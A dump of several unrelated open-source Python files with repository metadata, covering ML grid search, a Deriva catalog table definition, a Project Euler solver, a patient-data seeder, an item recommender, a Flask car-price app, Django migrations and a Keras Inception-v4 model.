    df_eq = pd.read_pickle('../dataframes/df_eq_label.pkl')
    with open('../dataframes/all_data.pkl', 'rb') as f:
        all_data = pickle.load(f)
    df_eq = process(df_eq)
    X = list(df_eq['train'])
    y = list(df_eq['label'])
    # 80/20 stratified split; only the training portion is used below.
    X_train, y_train, X_test, y_test = strat_test_train(X, y, 0.2)
    X_train = list(read_corpus(X_train))
    results = {}
    scores = []
    # NOTE(review): `params` is not defined in this part of the file —
    # presumably a module-level dict of hyper-parameter lists; confirm.
    for i, param in enumerate(list(product_dict(**params))):
        print('Checking set %r of parameters...' % i)
        scores = full_pipeline(scores, X_train, y_train, all_data, **param)
        results[i] = flatten( [param, list(zip(*scores[i]))] )
    # One row per parameter set: [index, params..., per-fold metric tuples].
    data = [[key] + [val for val in vals] for key, vals in results.items()]
    pr = pd.DataFrame(data, columns=['Model #', 'Parameters', 'Precision', 'Recall', 'F1', 'Accuracy'])
    # Collapse per-fold tuples into a single mean per metric.
    pr['Precision'] = pr['Precision'].apply(average)
    pr['Recall'] = pr['Recall'].apply(average)
    pr['F1'] = pr['F1'].apply(average)
    pr['Accuracy'] = pr['Accuracy'].apply(average)
    pd.to_pickle(pr, '../dataframes/grid_search_results.pkl')
|
[
"noreply@github.com"
] |
noreply@github.com
|
25eaf0a29411821417765885863acfd5166a02e3
|
7298d1692c6948f0880e550d6100c63a64ce3ea1
|
/deriva-annotations/catalog99/catalog-configs/Vocab/ihm_residues_not_modeled_reason.py
|
9a62ee7fbe832a6a342ee44c46b17d4607a9f500
|
[] |
no_license
|
informatics-isi-edu/protein-database
|
b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d
|
ce4be1bf13e6b1c22f3fccbb513824782609991f
|
refs/heads/master
| 2023-08-16T10:24:10.206574
| 2023-07-25T23:10:42
| 2023-07-25T23:10:42
| 174,095,941
| 2
| 0
| null | 2023-06-16T19:44:43
| 2019-03-06T07:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 5,585
|
py
|
import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
# Globus group UUIDs referenced by the ACLs and ACL bindings below.
groups = {
    'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
    'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
    'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
    'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
    'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b',
    'pdb-submitter': 'https://auth.globus.org/99da042e-64a6-11ea-ad5f-0ef992ed7ca1'
}
# Target ERMrest table: a controlled-vocabulary table in the Vocab schema.
table_name = 'ihm_residues_not_modeled_reason'
schema_name = 'Vocab'
# Per-column Chaise annotations (none currently).
column_annotations = {
    'ID': {},
    'URI': {},
    'Name': {},
    'Description': {},
    'Synonyms': {},
    'Owner': {}
}
# Per-column comments shown in the catalog UI.
column_comment = {
    'ID': 'The preferred Compact URI (CURIE) for this term.',
    'URI': 'The preferred URI for this term.',
    'Name': 'None',
    'Description': 'None',
    'Synonyms': 'Alternate human-readable names for this term.',
    'Owner': 'Group that can update the record.'
}
column_acls = {}
column_acl_bindings = {}
# Standard vocabulary-table columns; ID/URI defaults are templated on RID.
column_defs = [
    em.Column.define(
        'ID',
        em.builtin_types['ermrest_curie'],
        nullok=False,
        default='PDB:{RID}',
        comment=column_comment['ID'],
    ),
    em.Column.define(
        'URI',
        em.builtin_types['ermrest_uri'],
        nullok=False,
        default='/id/{RID}',
        comment=column_comment['URI'],
    ),
    em.Column.define(
        'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
    ),
    em.Column.define(
        'Description',
        em.builtin_types['markdown'],
        nullok=False,
        comment=column_comment['Description'],
    ),
    em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
                     ),
    em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
                     ),
]
# Column display order for all Chaise contexts; system FK columns are shown
# via their foreign-key constraint names.
visible_columns = {
    '*': [
        'RID', 'Name', 'Description', 'ID', 'URI',
        ['Vocab', 'ihm_residues_not_modeled_reason_term_RCB_fkey'],
        ['Vocab', 'ihm_residues_not_modeled_reason_term_RMB_fkey'], 'RCT', 'RMT',
        ['Vocab', 'ihm_residues_not_modeled_reason_term_Owner_fkey']
    ]
}
# Rows are titled by their Name value in the UI.
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}
table_annotations = {
    chaise_tags.table_display: table_display,
    chaise_tags.visible_columns: visible_columns,
}
table_comment = 'A set of controlled vocabular terms.'
table_acls = {}
# Row-level policies: submitters may read; the owning group and the row
# creator may update/delete their own rows.
table_acl_bindings = {
    'released_reader': {
        'types': ['select'],
        'scope_acl': [groups['pdb-submitter']],
        'projection': ['RID'],
        'projection_type': 'nonnull'
    },
    'self_service_group': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['Owner'],
        'projection_type': 'acl'
    },
    'self_service_creator': {
        'types': ['update', 'delete'],
        'scope_acl': ['*'],
        'projection': ['RCB'],
        'projection_type': 'acl'
    }
}
# Uniqueness constraints: Name, RID, ID and URI must each be unique.
key_defs = [
    # NOTE(review): this constraint name omits the `_term` infix used by the
    # other three keys — presumably generator output, but verify it matches
    # the constraint name already present in the catalog.
    em.Key.define(
        ['Name'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_Namekey1']],
    ),
    em.Key.define(
        ['RID'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RIDkey1']],
    ),
    em.Key.define(
        ['ID'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_IDkey1']],
    ),
    em.Key.define(
        ['URI'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_URIkey1']],
    ),
]
# Foreign keys: RCB/RMB point at ERMrest client records; Owner points at a
# catalog group, with curator-only write access plus a self-set binding.
fkey_defs = [
    em.ForeignKey.define(
        ['RCB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RCB_fkey']],
    ),
    em.ForeignKey.define(
        ['RMB'],
        'public',
        'ERMrest_Client', ['ID'],
        constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RMB_fkey']],
    ),
    em.ForeignKey.define(
        ['Owner'],
        'public',
        'Catalog_Group', ['ID'],
        constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_Owner_fkey']],
        acls={
            'insert': [groups['pdb-curator']],
            'update': [groups['pdb-curator']]
        },
        acl_bindings={
            # A user may set Owner to a group they are a member of.
            'set_owner': {
                'types': ['update', 'insert'],
                'scope_acl': ['*'],
                'projection': ['ID'],
                'projection_type': 'acl'
            }
        },
    ),
]
# Assemble the full ERMrest table definition from the pieces above;
# provide_system=True adds the standard RID/RCT/RMT/RCB/RMB columns.
table_def = em.Table.define(
    table_name,
    column_defs=column_defs,
    key_defs=key_defs,
    fkey_defs=fkey_defs,
    annotations=table_annotations,
    acls=table_acls,
    acl_bindings=table_acl_bindings,
    comment=table_comment,
    provide_system=True
)
def main(catalog, mode, replace=False, really=False):
    """Apply this table definition to the given ERMrest catalog.

    Attaches the per-column annotations/comments to the definition, then
    delegates to CatalogUpdater in the requested mode.
    """
    table_def['column_annotations'] = column_annotations
    table_def['column_comment'] = column_comment
    CatalogUpdater(catalog).update_table(mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
host = 'pdb.isrd.isi.edu'
catalog_id = 99
mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
catalog = ErmrestCatalog('https', host, catalog_id=catalog_id, credentials=get_credential(host))
main(catalog, mode, replace)
|
[
"brinda.vallat@rcsb.org"
] |
brinda.vallat@rcsb.org
|
f0170ac151345298ff4e2d5ba825617e0b46da30
|
597c0143c3ff325f2bd13e915623f6b5b29dcec9
|
/p35.py
|
fdb51ee0232a5b205bdcf312e25061b3b43391d0
|
[] |
no_license
|
jpgerek/projecteuler
|
77949426d629c0be629857958c28f451961d1608
|
79e35a8e6149946769149714607556238bfe12ed
|
refs/heads/master
| 2016-09-05T14:09:45.821755
| 2013-02-01T19:34:41
| 2013-02-01T19:34:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
import math
import itertools
from euler import is_prime, gen_primes
def is_circular_prime(prime):
    """Return True if every digit rotation of `prime` is itself prime."""
    digits = list(str(prime))
    for _ in xrange(len(digits)):
        # Rotate left by one digit and test the resulting number.
        digits = digits[1:] + digits[:1]
        if not is_prime(int(''.join(digits))):
            return False
    return True
# Count circular primes below one million (Project Euler problem 35).
print len([prime for prime in gen_primes(1000000) if is_circular_prime(prime)])
|
[
"juanpablo@guereca.com"
] |
juanpablo@guereca.com
|
d403e1d92d5fada8b340149b66f4add0b2857bc3
|
3e9830b5db4e2a51885e4481f75f8b367ef90c69
|
/app/app/seeder/seed_pasien.py
|
772366ed47c3bb30a666208844adfdd70198b406
|
[] |
no_license
|
dickymahfudin/sistem-rumah-sakit
|
280c2b296440798da85109b57b7033a18e57a1cd
|
b1ff1c146b666e04258ce7fc34c389b4c261691e
|
refs/heads/master
| 2023-04-05T16:49:08.790493
| 2021-04-22T05:21:24
| 2021-04-22T05:21:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
import random
from sqlalchemy.orm import Session
from .base_seeder import faker
from ..crud.crud_pasien import crud_pasien
from ..schemas.pasien import PasienCreate
def seed_pasien(iter, db):
    """Insert `iter` fake patient rows into the database via crud_pasien.

    Note: the parameter name `iter` shadows the builtin but is kept for
    caller compatibility.
    """
    for _ in range(iter):
        payload = PasienCreate(
            nama=faker.name(),
            alamat=faker.address(),
            tanggal_lahir=faker.date(),
            # City names can exceed the column width; truncate to 20 chars.
            tempat_lahir=faker.city()[:20],
            no_hp=faker.phone_number(),
            bpjs=faker.pybool(),
            rfid=str(faker.random_int(10)),
        )
        crud_pasien.create(db=db, obj_in=payload)
|
[
"hadyanadamn@gmail.com"
] |
hadyanadamn@gmail.com
|
f204104b60002eee4665f79f8e218ef2c862bc5a
|
9cb6c9f95449e6321566d65081d7b83ad1923ed7
|
/src/item_recommender.py
|
68d9f4b3968e50eeea4336c2300de43009684722
|
[] |
no_license
|
yamasjose11/tedtalk-recommendation-system
|
8bf866c5cc697c6e8b81572368e1c77afa629524
|
8d37dbbced9987d02c1af3f3403106994608cfa4
|
refs/heads/main
| 2023-02-24T22:42:02.336433
| 2021-02-02T18:18:19
| 2021-02-02T18:18:19
| 333,611,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,835
|
py
|
from sklearn.metrics.pairwise import cosine_similarity
import pandas as pd
import numpy as np
class ItemRecommender():
    '''
    Content based item recommender
    '''
    def __init__(self, similarity_measure=None):
        # Lazily filled by fit(): full item-item similarity DataFrame and names.
        self.similarity_matrix = None
        self.item_names = None
        # Default to cosine similarity when no measure is supplied.
        if similarity_measure == None:
            self.similarity_measure = cosine_similarity
        else:
            self.similarity_measure = similarity_measure
    def fit(self, X, titles=None):
        '''
        Takes a numpy array of the item attributes and creates the similarity matrix
        INPUT -
            X: NUMPY ARRAY - Rows are items, columns are feature values / or DF
            titles: LIST - List of the item names/titles in order of the numpy arrray
        OUTPUT - None
        Notes: You might want to keep titles and X as attributes to refer to them later
        Create the a similarity matrix of item to item similarity
        '''
        # While keeping this as a sparse matrix would be best the cosign sim
        # function returns a array so there is no reason.
        # DataFrame input: item names come from the index; array input: from `titles`.
        if isinstance(X, pd.DataFrame):
            self.item_counts = X
            self.item_names = X.index
            self.similarity_df = pd.DataFrame(self.similarity_measure(X.values, X.values),
                                              index = self.item_names)
        else:
            self.item_counts = X
            self.similarity_df = pd.DataFrame(self.similarity_measure(X, X),
                                              index = titles)
            self.item_names = self.similarity_df.index
    def get_recommendations(self, item, n=5):
        '''
        Returns the top n items related to the item passed in
        INPUT:
            item    - STRING - Name of item in the original DataFrame
            n       - INT    - Number of top related items to return
        OUTPUT:
            items - List of the top n related item names
        For a given item find the n most similar items to it (this can be done using the similarity matrix created in the fit method)
        '''
        # argsort ascending; [-(n+1):-1] skips the top hit (the item itself),
        # then [::-1] orders the remaining n by decreasing similarity.
        return self.item_names[self.similarity_df.loc[item].values.argsort()[-(n+1):-1]].values[::-1]
    def get_user_profile(self, items):
        '''
        Takes a list of items and returns a user profile. A vector representing the likes of the user.
        INPUT:
            items  - LIST - list of movie names user likes / has seen
        OUTPUT:
            user_profile - NP ARRAY - array representing the likes of the user
        The columns of this will match the columns of the trained on matrix
        Using the list of items liked by the user create a profile which will be a 1 x number of features array.  This should be the addition of the values for all liked item features (you can choose how to normalize if you think it is needed)
        '''
        # Simple additive profile: sum of the liked items' feature rows.
        # NOTE(review): this `.loc` lookup assumes item_counts is a DataFrame
        # (the fit() array branch stores a plain ndarray) — confirm usage.
        user_profile = np.zeros(self.item_counts.shape[1])
        for item in items:
            user_profile += self.item_counts.loc[item].values
        return user_profile
    def get_user_recommendation(self, items, n=5):
        '''
        Takes a list of movies user liked and returns the top n items for that user
        INPUT
            items  - LIST - list of movie names user likes / has seen
            n -  INT - number of items to return
        OUTPUT
            items - LIST - n recommended items
        Make use of the get_user_profile method to create a user profile that will be used to get the similarity to all items and recommend the top n.
        '''
        # Skip the last `num_items` entries of the sorted similarities on the
        # assumption that the user's own liked items rank highest.
        num_items = len(items)
        user_profile = self.get_user_profile(items)
        user_sim = self.similarity_measure(self.item_counts, user_profile.reshape(1,-1))
        return self.item_names[user_sim[:,0].argsort()[-(num_items+n):-num_items]].values[::-1]
|
[
"yamasjose11@gmail.com"
] |
yamasjose11@gmail.com
|
4b28b8979101e0dd287e1c26d062c0b3d58b0f82
|
6ebe5412b16bb48d89b9e7e3268dc5712a05bc75
|
/app.py
|
8a1442f41d1d633179a3f29ae8847204b1becb0e
|
[] |
no_license
|
Nishanbuyo/car_prediction
|
d850cf2f6d61ea181a27ed17e31a1c991e71937f
|
d7f7552db39e5b54950f6f39679e13d3f2c42149
|
refs/heads/master
| 2023-01-12T15:47:14.556471
| 2020-11-06T11:31:57
| 2020-11-06T11:31:57
| 310,578,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
from flask import Flask, render_template, request
import jsonify
import requests
import joblib
import numpy as np
import sklearn
from sklearn.preprocessing import StandardScaler
app = Flask(__name__)
# Pre-trained linear-regression model, loaded once at startup.
model = joblib.load('linear-regressor.joblib')
@app.route('/',methods=['GET'])
def Home():
    """Render the landing page with the car-details form."""
    return render_template('index.html')
# NOTE(review): this scaler is created but never fitted or used below —
# presumably left over from an earlier version; confirm before removing.
standard_to = StandardScaler()
@app.route("/predict", methods=['POST'])
def predict():
Fuel_Type_Diesel=0
if request.method == 'POST':
Year = int(request.form['Year'])
Present_Price=float(request.form['Present_Price'])
Kms_Driven=int(request.form['Kms_Driven'])
Kms_Driven2=np.log(Kms_Driven)
Owner=int(request.form['Owner'])
Fuel_Type_Petrol=request.form['Fuel_Type_Petrol']
if(Fuel_Type_Petrol=='Petrol'):
Fuel_Type_Petrol=1
Fuel_Type_Diesel=0
elif(Fuel_Type_Petrol=='Diesel'):
Fuel_Type_Petrol=0
Fuel_Type_Diesel=1
else:
Fuel_Type_Petrol=0
Fuel_Type_Diesel=0
Year=2020-Year
Seller_Type_Individual=request.form['Seller_Type_Individual']
if(Seller_Type_Individual=='Individual'):
Seller_Type_Individual=1
else:
Seller_Type_Individual=0
Transmission_Mannual=request.form['Transmission_Mannual']
if(Transmission_Mannual=='Mannual'):
Transmission_Mannual=1
else:
Transmission_Mannual=0
prediction=model.predict([[Present_Price,Kms_Driven,Owner,Year,Fuel_Type_Diesel,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Mannual]])
output=round(prediction[0],2)
if output<0:
return render_template('index.html',prediction_texts="Sorry you cannot sell this car")
else:
return render_template('index.html',prediction_text="You Can Sell The Car at {}".format(output))
else:
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"nishanbuyo05@gmail.com"
] |
nishanbuyo05@gmail.com
|
ff6e723cffc4626cbc971d1900ff2668dc155b64
|
5ea8955f860a3a664a8c778e7cf41f024949b73d
|
/blog/migrations/0001_initial.py
|
fe1ace398611955eb95b0e25c016002fb3ec2724
|
[] |
no_license
|
deolands/my-first-blog
|
3a881c4a1051442cf424a9724d728fdc3528d8e0
|
b14051d8ca336d813d68cc92207dc19d3c703771
|
refs/heads/master
| 2020-06-19T11:58:55.592977
| 2016-11-27T20:58:51
| 2016-11-27T20:58:51
| 74,906,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-27 18:22
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated by Django 1.10.3 (`makemigrations`) — edit with care;
    # creates the initial Post model with an FK to the configured user model.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"deolands@gmail.com"
] |
deolands@gmail.com
|
8b5ba43ea0cb1a80285b264a1c64c0896cc7703c
|
6f7e55851425097567637e0667d8407a6c7c6666
|
/tweets/migrations/0009_auto_20210602_2211.py
|
128ac2f934c458857c1952004d640810e5b88369
|
[] |
no_license
|
sumit9mishra/tweeter-clone
|
00733e7aa4c92c13b55abd79bb0703bbe7570428
|
0b64e50907eb32c07dc0099b9144514af18a13ef
|
refs/heads/main
| 2023-05-07T08:00:22.068384
| 2021-06-02T23:42:20
| 2021-06-02T23:42:20
| 372,466,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
# Generated by Django 3.0 on 2021-06-02 16:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 3.0 (`makemigrations`) — alters two FKs:
    # tweet.parent becomes SET_NULL (nullable), tweetlike.tweet stays CASCADE.
    dependencies = [
        ('tweets', '0008_auto_20210602_2159'),
    ]
    operations = [
        migrations.AlterField(
            model_name='tweet',
            name='parent',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='tweets.Tweet'),
        ),
        migrations.AlterField(
            model_name='tweetlike',
            name='tweet',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tweets.Tweet'),
        ),
    ]
|
[
"sumitmishrab@gmail.com"
] |
sumitmishrab@gmail.com
|
cc1215a5f8506aa20763f0de669445ebd84802b5
|
d76b52cdddad23c0c5746a71e16978350c84d359
|
/src/model/inception_v4.py
|
7cdf540d3a1903548d01bb3c53fc22b1b1846f77
|
[] |
no_license
|
Mahedi-61/kaggle_dogs_vs_cats
|
af24454c9bcf3ae21657a4fa2c98394791fd3878
|
2604d5ffef0f347c55030c741fbd99789b435b1e
|
refs/heads/master
| 2021-09-07T06:07:00.960617
| 2018-02-18T13:45:33
| 2018-02-18T13:45:33
| 118,255,946
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,613
|
py
|
'''
Copyright 2017 TensorFlow Authors and Kent Sommer
'''
#########################################################################################
# Implements the Inception Network v4 (http://arxiv.org/pdf/1602.07261v1.pdf) in Keras. #
#########################################################################################
from keras.layers import (MaxPooling2D, Conv2D, AveragePooling2D,
Input, Dropout, Dense, Flatten,
Activation, BatchNormalization)
from keras.layers.merge import concatenate
from keras import regularizers
from keras import initializers
from keras.models import Model
from keras import backend as K
def conv2d_bn(x,
              nb_filter,
              num_row,
              num_col,
              padding='same',
              strides=(1, 1),
              use_bias=False):
    """
    Utility function to apply conv + BN.
    (Slightly modified from official keras inception_v3.py)

    Applies Conv2D(nb_filter, (num_row, num_col)) -> BatchNorm -> ReLU to x
    and returns the resulting tensor.
    """
    # Channel axis depends on the backend image layout.
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Bias is omitted by default since BatchNorm immediately follows.
    x = Conv2D(nb_filter,
               (num_row, num_col),
               strides=strides,
               padding=padding,
               use_bias=use_bias,
               kernel_regularizer=regularizers.l2(0.00004),
               kernel_initializer=initializers.VarianceScaling(scale=2.0,
                                  mode='fan_in', distribution='normal', seed=None))(x)
    x = BatchNormalization(axis=channel_axis, momentum=0.9997, scale=False)(x)
    x = Activation('relu')(x)
    return x
def block_inception_a(input_):
    """Inception-A block: 1x1, 3x3, double-3x3 and avg-pool branches, concatenated."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    branch_0 = conv2d_bn(input_, 96, 1, 1)
    branch_1 = conv2d_bn(input_, 64, 1, 1)
    branch_1 = conv2d_bn(branch_1, 96, 3, 3)
    branch_2 = conv2d_bn(input_, 64, 1, 1)
    branch_2 = conv2d_bn(branch_2, 96, 3, 3)
    branch_2 = conv2d_bn(branch_2, 96, 3, 3)
    branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input_)
    branch_3 = conv2d_bn(branch_3, 96, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def block_reduction_a(input_):
    """Reduction-A block: strided 3x3, 1x1->3x3->strided-3x3 and max-pool branches."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    branch_0 = conv2d_bn(input_, 384, 3, 3, strides=(2,2), padding='valid')
    branch_1 = conv2d_bn(input_, 192, 1, 1)
    branch_1 = conv2d_bn(branch_1, 224, 3, 3)
    branch_1 = conv2d_bn(branch_1, 256, 3, 3, strides=(2,2), padding='valid')
    branch_2 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(input_)
    x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
    return x
def block_inception_b(input_):
    """Inception-B block using factorised 1x7/7x1 convolutions plus pooling."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    branch_0 = conv2d_bn(input_, 384, 1, 1)
    branch_1 = conv2d_bn(input_, 192, 1, 1)
    branch_1 = conv2d_bn(branch_1, 224, 1, 7)
    branch_1 = conv2d_bn(branch_1, 256, 7, 1)
    branch_2 = conv2d_bn(input_, 192, 1, 1)
    branch_2 = conv2d_bn(branch_2, 192, 7, 1)
    branch_2 = conv2d_bn(branch_2, 224, 1, 7)
    branch_2 = conv2d_bn(branch_2, 224, 7, 1)
    branch_2 = conv2d_bn(branch_2, 256, 1, 7)
    branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input_)
    branch_3 = conv2d_bn(branch_3, 128, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def block_reduction_b(input_):
    """Reduction-B block: two conv branches with stride-2 tails plus max-pool."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    branch_0 = conv2d_bn(input_, 192, 1, 1)
    branch_0 = conv2d_bn(branch_0, 192, 3, 3, strides=(2, 2), padding='valid')
    branch_1 = conv2d_bn(input_, 256, 1, 1)
    branch_1 = conv2d_bn(branch_1, 256, 1, 7)
    branch_1 = conv2d_bn(branch_1, 320, 7, 1)
    branch_1 = conv2d_bn(branch_1, 320, 3, 3, strides=(2,2), padding='valid')
    branch_2 = MaxPooling2D((3, 3), strides=(2, 2), padding='valid')(input_)
    x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
    return x
def block_inception_c(input_):
    """Inception-C block with split 1x3/3x1 sub-branches, concatenated."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    branch_0 = conv2d_bn(input_, 256, 1, 1)
    # Branch 1 forks into parallel 1x3 and 3x1 convolutions.
    branch_1 = conv2d_bn(input_, 384, 1, 1)
    branch_10 = conv2d_bn(branch_1, 256, 1, 3)
    branch_11 = conv2d_bn(branch_1, 256, 3, 1)
    branch_1 = concatenate([branch_10, branch_11], axis=channel_axis)
    # Branch 2: 3x1 then 1x3, then forks like branch 1.
    branch_2 = conv2d_bn(input_, 384, 1, 1)
    branch_2 = conv2d_bn(branch_2, 448, 3, 1)
    branch_2 = conv2d_bn(branch_2, 512, 1, 3)
    branch_20 = conv2d_bn(branch_2, 256, 1, 3)
    branch_21 = conv2d_bn(branch_2, 256, 3, 1)
    branch_2 = concatenate([branch_20, branch_21], axis=channel_axis)
    branch_3 = AveragePooling2D((3, 3), strides=(1, 1), padding='same')(input_)
    branch_3 = conv2d_bn(branch_3, 256, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def inception_v4_base(input_):
    """Inception-v4 feature extractor: stem followed by 4xA, Red-A, 7xB, Red-B, 3xC."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Input Shape is 299 x 299 x 3 (th) or 3 x 299 x 299 (th)
    # Stem: initial strided/valid convolutions and mixed pool/conv forks.
    net = conv2d_bn(input_, 32, 3, 3, strides=(2,2), padding='valid')
    net = conv2d_bn(net, 32, 3, 3, padding='valid')
    net = conv2d_bn(net, 64, 3, 3)
    branch_0 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
    branch_1 = conv2d_bn(net, 96, 3, 3, strides=(2,2), padding='valid')
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    branch_0 = conv2d_bn(net, 64, 1, 1)
    branch_0 = conv2d_bn(branch_0, 96, 3, 3, padding='valid')
    branch_1 = conv2d_bn(net, 64, 1, 1)
    branch_1 = conv2d_bn(branch_1, 64, 1, 7)
    branch_1 = conv2d_bn(branch_1, 64, 7, 1)
    branch_1 = conv2d_bn(branch_1, 96, 3, 3, padding='valid')
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    branch_0 = conv2d_bn(net, 192, 3, 3, strides=(2,2), padding='valid')
    branch_1 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    # 35 x 35 x 384
    # 4 x Inception-A blocks
    for idx in range(4):
        net = block_inception_a(net)
    # 35 x 35 x 384
    # Reduction-A block
    net = block_reduction_a(net)
    # 17 x 17 x 1024
    # 7 x Inception-B blocks
    for idx in range(7):
        net = block_inception_b(net)
    # 17 x 17 x 1024
    # Reduction-B block
    net = block_reduction_b(net)
    # 8 x 8 x 1536
    # 3 x Inception-C blocks
    for idx in range(3):
        net = block_inception_c(net)
    return net
def InceptionV4(include_top = False,
                input_shape = (299, 299, 3),
                weights_path = None,
                input_tensor = None):
    '''
    Creates the inception v4 network

    Args:
        include_top: whether to append the 8x8 avg-pool / dropout / dense head.
        input_shape = default (299, 299, 3)
                      for full model image size should be default value.
                      otherwise pooling window size should be adjusted.
                      for without top image size should be (139, 129 ,3) or more than that.
        weights_path: optional path to a weights file loaded after building.
        input_tensor: optional existing tensor to build on instead of a new Input.

    Returns:
        logits: the logits outputs of the model.
    '''
    # Input Shape is 299 x 299 x 3 (tf) or 3 x 299 x 299 (th)
    if input_tensor is None:
        img_input = Input(shape = input_shape)
    else:
        if not K.is_keras_tensor(input_tensor):
            img_input = Input(tensor=input_tensor, shape=input_shape)
        else:
            img_input = input_tensor
    # Make inception base
    x = inception_v4_base(img_input)
    # Final pooling and prediction
    if include_top:
        # 1 x 1 x 1536
        x = AveragePooling2D((8,8), padding='valid')(x)
        x = Dropout(0.2)(x)
        x = Flatten()(x)
        # 1536
        # NOTE(review): class count is hard-coded to 1000 (ImageNet) here.
        x = Dense(1000, activation='softmax')(x)
    #Since layers are not given name hence
    #we can't upload weights by layer name
    #so for with or without top two seperate weight have to use
    #create model
    model = Model(img_input, x, name='inception_v4')
    if weights_path:
        model.load_weights(weights_path)
    return model
|
[
"mahedi0803061@gmail.com"
] |
mahedi0803061@gmail.com
|
beed92594803d776a2364c3b3f53324fd5b2ace0
|
2d6940c2560d89f2fc9bf2015c502ad0f1946824
|
/Class_Python.py
|
5be935c66354d4f43af8c77ac38c4d164dc59259
|
[] |
no_license
|
101guptaji/Python-programmes
|
40b12de60d75f31254ec9a52580142a17ea3f214
|
81a5d8ea8ce498e4e1f2884818a0e39762832fa2
|
refs/heads/main
| 2023-04-02T06:42:39.177640
| 2021-03-23T18:01:02
| 2021-03-23T18:01:02
| 350,808,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
class Apple:
    """An apple described by its color and flavor."""

    def __init__(self, color, flavor):
        """Store the apple's color and flavor."""
        self.color = color
        self.flavor = flavor

    def __str__(self):
        """Human-readable description reflecting the current attribute values."""
        return f"This apple is {self.color} and its flavor is {self.flavor}"
myapple=Apple("red", "sweet")
myapple.color="blue"
print(myapple)
|
[
"noreply@github.com"
] |
noreply@github.com
|
9bc0203a5ad7b9018aa6800ff71449d5b924bcca
|
d34f3c73c4ed804f48fbed476f22013e5d951daa
|
/web/django_poll/polls/urls.py
|
